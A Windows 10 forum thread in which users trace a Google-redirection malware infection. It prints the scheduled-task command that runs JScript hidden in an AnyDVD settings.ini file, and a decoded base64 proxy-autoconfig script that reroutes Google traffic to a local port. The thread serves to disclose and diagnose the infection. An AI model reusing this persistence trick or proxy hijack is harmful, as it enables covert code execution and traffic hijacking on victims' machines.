Google redirection localhost.world

Hi guys, I also registered to tell that I finally found the source of my infection, in an AnyDVD update scheduled task :

This was triggered 3 times a week at 18:00

Code:

C:\WINDOWS\system32\wscript.exe //nologo //B //E:jscript "C:\Users\(me)\AppData\Roaming\AnyDVD HD\settings.ini"

The malicious code is hidden in the ini file, as described in page 4.

Kudos to people that hinted to check scheduled tasks, this thing was driving me crazy !

PC-SÉBASTIEN-29_12_2015__83417,50.zip

sgauge said:

Hi guys, I also registered to tell that I finally found the source of my infection, in an AnyDVD update scheduled task :

This was triggered 3 times a week at 18:00

Code:

C:\WINDOWS\system32\wscript.exe //nologo //B //E:jscript "C:\Users\(me)\AppData\Roaming\AnyDVD HD\settings.ini"

The malicious code is hidden in the ini file, as described in page 4.

Kudos to people that hinted to check scheduled tasks, this thing was driving me crazy !

Hi sgauge and welcome to Tenforums.
Thanks for posting your information - every little bit helps.
I wonder if you might help us further detect how this is happening, so we can get some tangible information to send out to Bleeping Computer and the AVs? If you would, please run the BSOD posting instructions found in this thread; even though this infection is not causing BSODs, we may be able to figure out the infection method of this thing, to block it in the future. Thanks.

@sgauge Please upload the BSOD Posting instructions BSOD - Posting Instructions - Windows 10 Forums. Upload them here. This will tell you how Screenshots and Files - Upload and Post in Ten Forums - Windows 10 Forums.

Maintown said:

Found mine under C:\Users\username\AppData\Roaming\ConvertXtoDVD\settings.ini

Thanks for letting us know. Would you mind uploading the info in post #73, so we can try to find the source of this infection? Thanks.

sgauge said:

Hi there, I updated post #71 with the requested zip file.

Thanks!

rolibark said:

I was infected too. But only by its "localhost.world" script part.
Looking at the latter part of post #39 (by moraleja39), the one contributed by "mtmyoq.se" part of this Maleware, decoding its base64 encoded string:
==========
ZnVuY3Rpb24gRmluZFByb3h5Rm9yVVJMKHVybCwgaG9zdCkgeyBpZiAoc2hFeHBNYXRjaChob3N0LCAid3d3Lmdvb2dsZS4qIikp IHJldHVybiAiUFJPWFkgMTI3LjAuMC4xOjgwODAiOyAgcmV0dXJuICJESVJFQ1QiO30
==========


Leads to :
==========
function FindProxyForURL(url, host) { if (shExpMatch(host, "www.google.*")) return "PROXY 127.0.0.1:8080"; return "DIRECT";}
==========

Which seems (I presume - not an expert on "localhost" ports) that another flavor of this Maleware HiJacks any access to Google sites to a NOT used port (unless you have some server responding at port 8080 - alike your own WEB server running).

So it seems that this Maleware has 2 parts: the "localhost.world" script, and the "mtmyoq.se" part.
And that folks are infected by only 1 of them. Not by both at the same time.
Strange.

Hi rolibark and welcome to Tenforums.

Thanks very much for posting this info. Every little bit helps! Would you mind uploading the info in post #73, so we can try to find the source of this infection? Thanks! :)